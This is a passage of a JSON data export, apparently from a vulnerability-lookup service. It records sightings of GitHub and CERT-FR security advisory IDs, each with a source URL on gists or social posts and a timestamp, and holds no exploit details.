"2025-07-16T06:05:35.000000Z"}, {"uuid": "cb01b033-fe84-4588-b24f-0e4e3f42dd47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/57636fb56c908ea716ca50f36824e43c", "content": "", "creation_timestamp": "2025-07-16T09:49:54.000000Z"}, {"uuid": "3f5f89b8-4cf4-42df-a643-e8eda5d50823", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8xfc-gm6g-vgpv", "type": "seen", "source": "https://gist.github.com/safer-bot/57636fb56c908ea716ca50f36824e43c", "content": "", "creation_timestamp": "2025-07-16T09:49:54.000000Z"}, {"uuid": "ae050172-ce8b-4977-bfca-4a8721b5f5f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/7e07e93d11e05f19d9482e1d0c25aa12", "content": "", "creation_timestamp": "2025-07-16T11:47:25.000000Z"}, {"uuid": "94923278-f085-4638-a9b3-3eeece71b960", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wxr5-93ph-8wr9", "type": "seen", "source": "https://gist.github.com/safer-bot/7e07e93d11e05f19d9482e1d0c25aa12", "content": "", "creation_timestamp": "2025-07-16T11:47:25.000000Z"}, {"uuid": "b1b8accc-96cc-4791-a220-1a1828643d0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/7e07e93d11e05f19d9482e1d0c25aa12", "content": "", "creation_timestamp": "2025-07-16T11:47:25.000000Z"}, {"uuid": "6c301a8a-73c4-495d-bed7-a2b4f8833301", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/7e07e93d11e05f19d9482e1d0c25aa12", "content": "", "creation_timestamp": "2025-07-16T11:47:25.000000Z"}, {"uuid": "d33883ba-b119-488d-83b8-a42716ae887d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/7e07e93d11e05f19d9482e1d0c25aa12", "content": "", "creation_timestamp": "2025-07-16T11:47:25.000000Z"}, {"uuid": "a249d070-2724-4013-9d6c-006d920d409a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/2f482c5bc09954d4823559547aad0290", "content": "", "creation_timestamp": "2025-07-16T06:30:26.000000Z"}, {"uuid": "41827c62-2ab3-4bf5-82ea-c3558f0ade24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/2f482c5bc09954d4823559547aad0290", "content": "", "creation_timestamp": "2025-07-16T06:30:26.000000Z"}, {"uuid": "ccf2a752-eed7-4b1a-8347-e1955f4cccde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/d4cf284edbe09f9ab1c1abfadd6e43c4", "content": "", "creation_timestamp": "2025-07-16T06:29:49.000000Z"}, {"uuid": "3a7f9519-f8f0-4e64-9319-3879f16cb920", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/d4cf284edbe09f9ab1c1abfadd6e43c4", "content": "", "creation_timestamp": "2025-07-16T06:29:49.000000Z"}, {"uuid": "060285c1-16f2-4b36-84e6-e35b5375b6e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/d4cf284edbe09f9ab1c1abfadd6e43c4", "content": "", "creation_timestamp": "2025-07-16T06:29:49.000000Z"}, {"uuid": "c6d53ff0-7548-4b66-90b4-700daad17c2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8p83-cpfg-fj3g", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114319534961696220", "content": "", "creation_timestamp": "2025-04-11T13:21:10.626779Z"}, {"uuid": "99d48d1a-25d8-4918-a20d-f0e9adec7d3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mq23-vvg7-xfm4", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114319534961696220", "content": "", "creation_timestamp": "2025-04-11T13:21:10.787172Z"}, {"uuid": "7cf63566-d379-4e30-ae13-1044ba8366b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xr9q-h9c7-xw8q", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114319534961696220", "content": "", "creation_timestamp": "2025-04-11T13:21:10.943571Z"}, {"uuid": "68126a18-1b88-441f-ac3e-794f78b32f60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j5hq-5jcr-xwx7", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114319534961696220", "content": "", "creation_timestamp": "2025-04-11T13:21:11.098281Z"}, {"uuid": "36b83284-5ca2-44bc-9880-62ffbf354130", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9c5p-35gj-jqp4", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114319534961696220", "content": "", "creation_timestamp": "2025-04-11T13:21:11.252077Z"}, {"uuid": "c478bd68-6059-482a-8ced-08ac220d85a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5qmp-9x47-92q8", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114319534961696220", "content": "", "creation_timestamp": "2025-04-11T13:21:11.407906Z"}, {"uuid": "0f4795fa-6915-4e3d-9343-98c9d16f6fa0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-004", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114319607597170080", "content": "", "creation_timestamp": "2025-04-11T13:39:40.592972Z"}, {"uuid": "bb2740c3-8bac-4be0-8c25-8f8c1398a054", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-004", "type": "seen", "source": "https://bsky.app/profile/cti-news.bsky.social/post/3lmk5n3wxhc2p", "content": "", "creation_timestamp": "2025-04-11T13:44:19.078032Z"}, {"uuid": "f36ba454-5a93-4cc9-95ac-be7b60c9acc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-021", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lpjpkuyelx2w", "content": "", "creation_timestamp": "2025-05-19T13:48:07.016294Z"}, {"uuid": "f336b4b1-ca73-429f-956d-093adc1b26f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/2f482c5bc09954d4823559547aad0290", "content": "", "creation_timestamp": "2025-07-16T06:30:26.000000Z"}, {"uuid": "02d98388-4a5d-4f8a-944e-4ff09cffa1c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/d4cf284edbe09f9ab1c1abfadd6e43c4", "content": "", "creation_timestamp": "2025-07-16T06:29:49.000000Z"}, {"uuid": "427175ec-cc5c-4b40-bd1f-4be1f73966f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/d4cf284edbe09f9ab1c1abfadd6e43c4", "content": "", "creation_timestamp": "2025-07-16T06:29:49.000000Z"}, {"uuid": "76db18e5-cab5-44cb-b117-980de5c58430", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/d4cf284edbe09f9ab1c1abfadd6e43c4", "content": "", "creation_timestamp": "2025-07-16T06:29:49.000000Z"}, {"uuid": "6949e9ad-eee5-4a96-af15-377f8db0112b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-599f-7c49-w659", "type": "seen", "source": "https://gist.github.com/safer-bot/33eb6239930b41b47aec1e2045875722", "content": "", "creation_timestamp": "2025-07-16T11:53:58.000000Z"}, {"uuid": "8a28cde4-6f48-4f09-9f53-b4bdd1451040", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/ac7888cd348a2c9b5cedd341ce88aeae", "content": "", "creation_timestamp": "2025-07-16T13:09:25.000000Z"}, {"uuid": "397e8ebe-e8b5-449d-842d-e7598fbd53ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/2f482c5bc09954d4823559547aad0290", "content": "", "creation_timestamp": "2025-07-16T06:30:26.000000Z"}, {"uuid": "d5ea5c75-b351-40db-b442-36e4a69da4c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/d4cf284edbe09f9ab1c1abfadd6e43c4", "content": "", "creation_timestamp": "2025-07-16T06:29:49.000000Z"}, {"uuid": "b68bde8d-4945-4144-acd3-c078d59474cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f82j-8pp7-cw2w", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114614778635202833", "content": "", "creation_timestamp": "2025-06-02T16:45:31.573790Z"}, {"uuid": "24b783e2-b0d3-4f0f-8abc-2a4171b2d11d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-859r-vvv8-rm8r", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114614778635202833", "content": "", "creation_timestamp": "2025-06-02T16:45:31.679049Z"}, {"uuid": "259de02a-a71d-4b27-94a5-0cbd9bdc22a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8qff-qr5q-5pr8", "type": "seen", "source": "https://bsky.app/profile/Sempf.infosec.exchange.ap.brid.gy/post/3lpq77ltcvzm2", "content": "", "creation_timestamp": "2025-05-22T03:47:11.460689Z"}, {"uuid": "b8dcef50-f85b-4e5d-866f-b4e1484d652a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/d4cf284edbe09f9ab1c1abfadd6e43c4", "content": "", "creation_timestamp": "2025-07-16T06:29:49.000000Z"}, {"uuid": "2d8aeefd-3603-479c-843e-bb6da221053f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/d4cf284edbe09f9ab1c1abfadd6e43c4", "content": "", "creation_timestamp": "2025-07-16T06:29:49.000000Z"}, {"uuid": "84b0e99e-a21d-4afa-ba9c-ea20d33eaf0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-029", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3ltz3hkjsaf2q", "content": "", "creation_timestamp": "2025-07-15T14:11:42.895545Z"}, {"uuid": "63755f6a-d226-41a8-9b56-6adf67506db9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-004", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-672871d8-0239cb22accdcf12", "content": "", "creation_timestamp": "2025-04-15T07:59:58.426625Z"}, {"uuid": "853b94e4-a6ef-4a14-9aa8-2eb3c89b190b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qqgg-hhfq-vhww", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114518165552832603", "content": "", "creation_timestamp": "2025-05-16T15:15:32.958084Z"}, {"uuid": "ed887a44-9d02-4787-b240-ca6510b2124d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q568-2933-gcjq", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114518165552832603", "content": "", "creation_timestamp": "2025-05-16T15:15:33.148631Z"}, {"uuid": "cf62bc11-db94-41e9-bdfb-084e7111c465", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qqgg-hhfq-vhww", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114518167613475040", "content": "", "creation_timestamp": "2025-05-16T15:16:04.061492Z"}, {"uuid": "d9908620-7a44-49a7-b8ea-aceb979af17e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q568-2933-gcjq", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114518167613475040", "content": "", "creation_timestamp": "2025-05-16T15:16:04.342011Z"}, {"uuid": "da14e5f2-56c3-45b7-a90f-9a400b7cb0ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9h3w-f3h4-qqrh", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114518172966589726", "content": "", "creation_timestamp": "2025-05-16T15:17:25.696472Z"}, {"uuid": "6af3bd52-71b5-4353-bbe7-bdbfed49b80a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c7vq-m7f8-rx37", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114518172966589726", "content": "", "creation_timestamp": "2025-05-16T15:17:25.809675Z"}, {"uuid": "c520a911-f5ad-4bc3-b9de-4b817d76eaa3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qm2f-959g-7p65", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114518172966589726", "content": "", "creation_timestamp": "2025-05-16T15:17:25.895079Z"}, {"uuid": "fb303240-7915-4a3b-b0e6-a5c83e7cb0a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wj44-9vcg-wjq7", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114774100581117797", "content": "", "creation_timestamp": "2025-06-30T20:03:11.197816Z"}, {"uuid": "d49db48b-4945-4867-ae20-7a91b21d394a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/d18c961302984311ff47c26030f5c337", "content": "", "creation_timestamp": "2025-07-16T06:49:27.000000Z"}, {"uuid": "93d9640d-a5f5-42c8-92c0-1c0706b9bae1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/d18c961302984311ff47c26030f5c337", "content": "", "creation_timestamp": "2025-07-16T06:49:27.000000Z"}, {"uuid": "c0a5d0ac-9dc0-4dc5-98e9-8f43f6983e7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-029", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3ltz6snpmws2i", "content": "", "creation_timestamp": "2025-07-15T15:11:36.563713Z"}, {"uuid": "3dd12c90-2f66-421f-b446-2c554f31f05f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/d18c961302984311ff47c26030f5c337", "content": "", "creation_timestamp": "2025-07-16T06:49:27.000000Z"}, {"uuid": "942d82a2-ce84-45f7-8cc6-45c9e2442808", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-026", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114732644952742769", "content": "", "creation_timestamp": "2025-06-23T12:20:33.092031Z"}, {"uuid": "a41619fb-983b-464d-ad28-8ed9255a9388", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/438dad92f077cc6bbce4ac627023d1fe", "content": "", "creation_timestamp": "2025-06-17T01:10:34.000000Z"}, {"uuid": "b3ff3ffc-e7a5-4892-b6ea-cacb2a317b22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w97f-w3hq-36g2", "type": "seen", "source": "https://gist.github.com/safer-bot/438dad92f077cc6bbce4ac627023d1fe", "content": "", "creation_timestamp": "2025-06-17T01:10:34.000000Z"}, {"uuid": "aeecd0ee-3ade-41de-87fe-e77bcf14f9da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jw7r-rxff-gv24", "type": "seen", "source": "https://gist.github.com/safer-bot/438dad92f077cc6bbce4ac627023d1fe", "content": "", "creation_timestamp": "2025-06-17T01:10:34.000000Z"}, {"uuid": "dc063619-9289-4ed1-9da7-7567f32f117f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q4xq-445g-g6ch", "type": "seen", "source": "https://gist.github.com/safer-bot/438dad92f077cc6bbce4ac627023d1fe", "content": "", "creation_timestamp": "2025-06-17T01:10:34.000000Z"}, {"uuid": "4c6bd409-a7df-44c4-a523-a710ea0fcc0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xmmm-jw76-q7vg", "type": "seen", "source": "https://gist.github.com/safer-bot/438dad92f077cc6bbce4ac627023d1fe", "content": "", "creation_timestamp": "2025-06-17T01:10:34.000000Z"}, {"uuid": "df6980bd-9244-486c-8667-7c13c498ab53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g4gc-rh26-m3p5", "type": "seen", "source": "https://gist.github.com/safer-bot/438dad92f077cc6bbce4ac627023d1fe", "content": "", "creation_timestamp": "2025-06-17T01:10:34.000000Z"}, {"uuid": "bc7ff338-f3bc-40ea-8745-4c3ce47b04a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9vm7-v8wj-3fqw", "type": "seen", "source": "https://gist.github.com/safer-bot/438dad92f077cc6bbce4ac627023d1fe", "content": "", "creation_timestamp": "2025-06-17T01:10:34.000000Z"}, {"uuid": "f52884f8-0d52-4e5c-a150-96439fbe0196", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/438dad92f077cc6bbce4ac627023d1fe", "content": "", "creation_timestamp": "2025-06-17T01:10:34.000000Z"}, {"uuid": "5bb2c62b-dd63-4f9a-a7f3-2e15ebb869bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93ww-43rr-79v3", "type": "seen", "source": "https://gist.github.com/safer-bot/438dad92f077cc6bbce4ac627023d1fe", "content": "", "creation_timestamp": "2025-06-17T01:10:34.000000Z"}, {"uuid": "9ce69f6a-29d8-435d-af0c-76e6f4e7cc5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/438dad92f077cc6bbce4ac627023d1fe", "content": "", "creation_timestamp": "2025-06-17T01:10:34.000000Z"}, {"uuid": "abcd0619-6e08-4906-a0f2-a4ca74c3ecca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vwpq-wm8w-44wf", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114774156067822141", "content": "", "creation_timestamp": "2025-06-30T20:17:18.112944Z"}, {"uuid": "5e569159-17ba-432f-8dbc-d8395cf98039", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7x3c-335v-wxjj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114774156067822141", "content": "", "creation_timestamp": "2025-06-30T20:17:18.213222Z"}, {"uuid": "91f51d1d-aafb-42f3-b143-36dab86487c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hmp7-x699-cvhq", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114343777087123748", "content": "", "creation_timestamp": "2025-04-15T20:06:15.797427Z"}, {"uuid": "922cf2d9-40e6-4b4c-9109-0a1afff0841e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9j32-gg3j-8w25", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114343784101287084", "content": "", "creation_timestamp": "2025-04-15T20:08:02.773985Z"}, {"uuid": "ff34d72d-9d62-4fa7-88ca-a1da52ba26f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m7pq-h9p4-8rr4", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114344064530909264", "content": "", "creation_timestamp": "2025-04-15T21:19:21.771839Z"}, {"uuid": "89b41d23-b5df-45f6-a683-b41c06e02fed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q4xq-445g-g6ch", "type": "seen", "source": "https://gist.github.com/safer-bot/8dd60afb8cd1c3b9d24fb6d89deabbeb", "content": "", "creation_timestamp": "2025-06-17T01:36:19.000000Z"}, {"uuid": "42b53d3f-36fa-4758-9e37-92cd55d3bd45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/6760e2e5c5c15c08cac56b85a4b18949", "content": "", "creation_timestamp": "2025-07-16T06:14:34.000000Z"}, {"uuid": "a62e6768-a7ce-411d-aedd-4c0ba456733f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/6760e2e5c5c15c08cac56b85a4b18949", "content": "", "creation_timestamp": "2025-07-16T06:14:34.000000Z"}, {"uuid": "082979e2-3c19-4d9b-9a34-6c85915e7ae2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/19a3375ea686e5b598d04878dfb53d86", "content": "", "creation_timestamp": "2025-07-16T09:53:00.000000Z"}, {"uuid": "7f68b829-99cd-4b45-bb78-e3db0b57ddcb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2x83-r56g-cv47", "type": "seen", "source": "https://gist.github.com/safer-bot/19a3375ea686e5b598d04878dfb53d86", "content": "", "creation_timestamp": "2025-07-16T09:53:00.000000Z"}, {"uuid": "d06024ad-1182-4d03-a49a-ddd9f1a98de0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3x8x-79m2-3w2w", "type": "seen", "source": "https://gist.github.com/safer-bot/4e4c49aa91979c33a80a1c0408ee55df", "content": "", "creation_timestamp": "2025-07-16T11:50:34.000000Z"}, {"uuid": "39a23607-b1b8-4851-a795-2d453a7ab1b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/4e4c49aa91979c33a80a1c0408ee55df", "content": 